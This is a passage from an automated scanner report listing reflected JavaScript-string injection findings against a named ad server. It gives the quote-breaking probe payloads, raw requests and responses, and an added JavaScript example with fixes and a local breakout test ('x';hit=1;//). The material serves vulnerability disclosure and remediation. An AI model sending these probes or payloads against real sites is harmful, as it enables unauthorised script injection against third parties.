This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20140829/3585/0/0/203687989/203687989//0/203/95425ec13'%3bb82047b1192//4000004/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1498
Cache-Control: max-age=2591945
Expires: Mon, 28 Mar 2011 01:49:03 GMT
Date: Sat, 26 Feb 2011 01:49:58 GMT
Connection: close


var zzADS_CHAN = '203687989';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5295.Internet.com/B5200652.4;sz=728x90;click0=http://o1.qnsr.com//cgi/c%3Fa=20140829%3Bx=3585%3Bg=0,0%3Bc=203687989,203687989%3Bi=0%3Bn=203%3Bs=95425ec13';b82047b1192%3B%3Bq=1%3Bk=' + zz_trd + ';ord=123456?">
...[SNIP]...

1.89. http://e2.cdn.qnsr.com//cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 585a1'%3b1941ee17325 was submitted in the REST URL parameter 4. This input was echoed as 585a1';1941ee17325 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20140829/3585585a1'%3b1941ee17325/0/0/203687989/203687989//0/203/9542//4000004/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1498
Cache-Control: max-age=2591996
Expires: Mon, 28 Mar 2011 01:49:28 GMT
Date: Sat, 26 Feb 2011 01:49:32 GMT
Connection: close


var zzADS_CHAN = '203687989';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5295.Internet.com/B5200652.4;sz=728x90;click0=http://o1.qnsr.com//cgi/c%3Fa=20140829%3Bx=3585585a1';1941ee17325%3Bg=0,0%3Bc=203687989,203687989%3Bi=0%3Bn=203%3Bs=9542%3B%3Bq=1%3Bk=' + zz_trd + ';ord=123456?">
...[SNIP]...

1.90. http://e2.cdn.qnsr.com//cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fde13'%3b899c01c4079 was submitted in the REST URL parameter 5. This input was echoed as fde13';899c01c4079 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20140829/3585/0fde13'%3b899c01c4079/0/203687989/203687989//0/203/9542//4000004/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1498
Cache-Control: max-age=2591982
Expires: Mon, 28 Mar 2011 01:49:17 GMT
Date: Sat, 26 Feb 2011 01:49:35 GMT
Connection: close


var zzADS_CHAN = '203687989';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5295.Internet.com/B5200652.4;sz=728x90;click0=http://o1.qnsr.com//cgi/c%3Fa=20140829%3Bx=3585%3Bg=0fde13';899c01c4079,0%3Bc=203687989,203687989%3Bi=0%3Bn=203%3Bs=9542%3B%3Bq=1%3Bk=' + zz_trd + ';ord=123456?">
...[SNIP]...

1.91. http://e2.cdn.qnsr.com//cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9129'%3b96c2477c71d was submitted in the REST URL parameter 6. This input was echoed as a9129';96c2477c71d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20140829/3585/0/0a9129'%3b96c2477c71d/203687989/203687989//0/203/9542//4000004/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1498
Cache-Control: max-age=2591947
Expires: Mon, 28 Mar 2011 01:48:46 GMT
Date: Sat, 26 Feb 2011 01:49:39 GMT
Connection: close


var zzADS_CHAN = '203687989';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5295.Internet.com/B5200652.4;sz=728x90;click0=http://o1.qnsr.com//cgi/c%3Fa=20140829%3Bx=3585%3Bg=0,0a9129';96c2477c71d%3Bc=203687989,203687989%3Bi=0%3Bn=203%3Bs=9542%3B%3Bq=1%3Bk=' + zz_trd + ';ord=123456?">
...[SNIP]...

1.92. http://e2.cdn.qnsr.com//cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59ed7'%3bde0cfbe8e7b was submitted in the REST URL parameter 7. This input was echoed as 59ed7';de0cfbe8e7b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. Unlike the sibling findings, this parameter is reflected directly into the assignment at the top of the script: the response below opens with var zzADS_CHAN = '20368798959ed7';de0cfbe8e7b'; which, as returned, leaves an unterminated string literal and so would not even parse. That is the clearest evidence in this group that the quote closes the string. The Content-Length of 1516, against 1498 for the other responses, is consistent with the 18-byte decoded payload being reflected a second time further down, in the same click URL position the other parameters occupy.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20140829/3585/0/0/20368798959ed7'%3bde0cfbe8e7b/203687989//0/203/9542//4000004/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1516
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:42 GMT
Date: Sat, 26 Feb 2011 01:49:42 GMT
Connection: close


var zzADS_CHAN = '20368798959ed7';de0cfbe8e7b';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = zzPage_obj[zzADS_CHAN].zzTrd;

...[SNIP]...
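The remediation text in these findings is generic. The example below is added here and is not code from the report or from the QUAD ad server. It shows the single-quoted assignment that finding 1.92 reflects into (var zzADS_CHAN = '...') in its vulnerable form beside two fixes, output encoding for a JavaScript string context and allowlist validation of the numeric channel id, plus a local check that actually runs the generated script. The click-URL variant covers the nested URL-in-HTML-in-JS position that the other findings in this group reflect into. Function names and the second payload are assumptions; the first payload is the value echoed in 1.92.

```javascript
// Added example, not code from the report or from the QUAD ad server.
// Vulnerable pattern from the 1.87-1.99 responses beside two hardened forms,
// with a local check. Names and the BREAKOUT_PAYLOAD value are assumptions.

// 1. The pattern in the responses: a path segment lands verbatim inside a
//    single-quoted JavaScript string, so a value containing ' closes the literal.
function renderVulnerable(chan) {
  return `var zzADS_CHAN = '${chan}';`;
}

// 2a. Output encoding for a JS single-quoted string context. Everything outside a
//     tight allowlist becomes \xHH or \uHHHH, so ' " \ < > / newlines and the
//     U+2028/2029 line terminators can neither close the literal nor the <script>.
function jsStringEscape(value) {
  return String(value).replace(/[^A-Za-z0-9_]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? "\\x" + code.toString(16).padStart(2, "0")
      : "\\u" + code.toString(16).padStart(4, "0");
  });
}
function renderHardened(chan) {
  return `var zzADS_CHAN = '${jsStringEscape(chan)}';`;
}

// 2b. Input validation: every channel id in the report is a short decimal number.
//     Rejecting anything else removes the problem before encoding is needed.
function renderValidated(chan) {
  if (!/^[0-9]{1,12}$/.test(String(chan))) {
    throw new TypeError("channel id must be 1-12 decimal digits");
  }
  return `var zzADS_CHAN = '${chan}';`;
}

// 3. In the click URL the value sits in a URL query, inside an HTML attribute,
//    inside a JS string. Encode from the inside out. encodeURIComponent keeps '
//    unescaped, which is exactly why the report's payloads (a2e4c'%3b...) arrive
//    with the quote intact, so the URL layer escapes it explicitly.
function percentEncodeStrict(value) {
  return encodeURIComponent(value).replace(/[!'()*]/g,
    (c) => "%" + c.charCodeAt(0).toString(16).toUpperCase());
}
function renderAdTagHardened(chan) {
  const click = "http://o1.qnsr.com//cgi/c?c=" + percentEncodeStrict(chan);
  const html = '<script src="http://ad.doubleclick.net/adj/N5295.Internet.com/B5200652.4;click0='
    + percentEncodeStrict(click) + '"></script>';
  return `document.write('${jsStringEscape(html)}');`;
}

// 4. Local check: run the generated script in a fresh function scope. `hit` is a
//    local that only a successful breakout can change. A string that was closed
//    but not repaired (the shape of the report's payload) shows up as a SyntaxError.
function runTemplate(script) {
  try {
    const fn = new Function("var hit = 0;\n" + script + "\nreturn { chan: zzADS_CHAN, hit: hit };");
    return { ok: true, ...fn() };
  } catch (e) {
    return { ok: false, error: e.name };
  }
}

// Constructed payloads: the first is the exact value echoed in finding 1.92, the
// second is a breakout of the same shape that also runs a statement.
const REPORT_PAYLOAD = "20368798959ed7';de0cfbe8e7b";
const BREAKOUT_PAYLOAD = "x';hit=1;//";

console.log(runTemplate(renderVulnerable("203687989")));       // { ok: true, chan: '203687989', hit: 0 }
console.log(runTemplate(renderVulnerable(REPORT_PAYLOAD)));    // { ok: false, error: 'SyntaxError' }
console.log(runTemplate(renderVulnerable(BREAKOUT_PAYLOAD)));  // { ok: true, chan: 'x', hit: 1 }
console.log(runTemplate(renderHardened(BREAKOUT_PAYLOAD)));    // { ok: true, chan: "x';hit=1;//", hit: 0 }
```

The validated form is the better fix for this endpoint because the ids are numeric and nothing else should ever reach the template; the escaping form is what to reach for when a free-text value genuinely has to be embedded. Apply both layers to the click URL: percent-encoding makes the value safe as URL data, and the JS-string escape makes the HTML that carries it safe inside the script.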

1.93. http://e2.cdn.qnsr.com//cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js

Issue detail

The value of REST URL parameter 8 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 714d0'%3b84e7733cd79 was submitted in the REST URL parameter 8. This input was echoed as 714d0';84e7733cd79 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20140829/3585/0/0/203687989/203687989714d0'%3b84e7733cd79//0/203/9542//4000004/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1498
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:45 GMT
Date: Sat, 26 Feb 2011 01:49:45 GMT
Connection: close


var zzADS_CHAN = '203687989';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5295.Internet.com/B5200652.4;sz=728x90;click0=http://o1.qnsr.com//cgi/c%3Fa=20140829%3Bx=3585%3Bg=0,0%3Bc=203687989,203687989714d0';84e7733cd79%3Bi=0%3Bn=203%3Bs=9542%3B%3Bq=1%3Bk=' + zz_trd + ';ord=123456?">
...[SNIP]...

1.94. http://e2.cdn.qnsr.com//cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js

Issue detail

The value of REST URL parameter 9 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5bc40'%3b05fa3e45893 was submitted in the REST URL parameter 9. This input was echoed as 5bc40';05fa3e45893 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20140829/3585/0/0/203687989/203687989//05bc40'%3b05fa3e45893/203/9542//4000004/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1498
Cache-Control: max-age=2591966
Expires: Mon, 28 Mar 2011 01:49:14 GMT
Date: Sat, 26 Feb 2011 01:49:48 GMT
Connection: close


var zzADS_CHAN = '203687989';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5295.Internet.com/B5200652.4;sz=728x90;click0=http://o1.qnsr.com//cgi/c%3Fa=20140829%3Bx=3585%3Bg=0,0%3Bc=203687989,203687989%3Bi=05bc40';05fa3e45893%3Bn=203%3Bs=9542%3B%3Bq=1%3Bk=' + zz_trd + ';ord=123456?">
...[SNIP]...

1.95. http://e2.cdn.qnsr.com//cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 10]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js

Issue detail

The value of REST URL parameter 10 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41e20'%3b27304de4fd1 was submitted in the REST URL parameter 10. This input was echoed as 41e20';27304de4fd1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20142454/2305/0/0/203687985/203687985//0/20341e20'%3b27304de4fd1/9542//3000007/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1499
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:51 GMT
Date: Sat, 26 Feb 2011 01:49:51 GMT
Connection: close


var zzADS_CHAN = '203687985';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
nguage=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5295.Internet.com/B5200652.6;sz=300x250;click0=http://o1.qnsr.com//cgi/c%3Fa=20142454%3Bx=2305%3Bg=0,0%3Bc=203687985,203687985%3Bi=0%3Bn=20341e20';27304de4fd1%3Bs=9542%3B%3Bq=1%3Bk=' + zz_trd + ';ord=123456?">
...[SNIP]...

1.96. http://e2.cdn.qnsr.com//cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 11]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js

Issue detail

The value of REST URL parameter 11 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cee84'%3bfb335840d2c was submitted in the REST URL parameter 11. This input was echoed as cee84';fb335840d2c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542cee84'%3bfb335840d2c//3000007/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1499
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:54 GMT
Date: Sat, 26 Feb 2011 01:49:54 GMT
Connection: close


var zzADS_CHAN = '203687985';
